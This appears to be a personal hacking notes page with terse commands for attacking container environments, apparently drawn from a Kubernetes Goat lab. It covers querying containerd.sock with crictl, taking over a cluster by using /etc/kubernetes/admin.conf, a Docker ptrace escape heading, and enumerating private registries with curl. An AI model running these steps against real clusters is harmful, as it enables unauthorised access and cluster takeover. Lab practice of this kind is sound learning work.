rootđź’€senseicat:~#

Hack. Eat. Sleep. Repeat!!!


Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

Exploiting Containerd.sock


image

wget https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.36.0/crictl-v1.36.0-darwin-amd64.tar.gz
runtime-endpoint: unix:///custom/containerd/containerd.sock
image-endpoint: unix:///custom/containerd/containerd.sock
timeout: 10
debug: false
crictl -r unix:///custom/containerd/containerd.sock images

image


Kubernetes DNS


<pod-IPv4-address>.<namespace>.pod.<cluster-domain>
<pod-ipv4-address>.<service-name>.<my-namespace>.svc.<cluster-domain.example>

image


Cluster takeover with /etc/kubernetes/admin.conf


./kubectl --kubeconfig /etc/kubernetes/admin.conf get nodes

image


Hacking docker containers with cap_sys_ptrace and –pid=HOST



Exploiting Kubernetes Private registries


curl <url>/v2/_catalog

image

http://127.0.0.1:1235/v2/_catalog/madhuakula/k8s-goat-users-repo/manifests/latest

image

image


Hacking docker registries


image

curl <url>/v2/<image>/manifests/latest -H "Accept: application/vnd.oci.image.manifest.v1+json, application/vnd.docker.distribution.manifest.v2+json" -H "Accept: application/vnd.oci.image.index.v1+json" -H "Accept: application/vnd.oci.image.manifest.v1+json"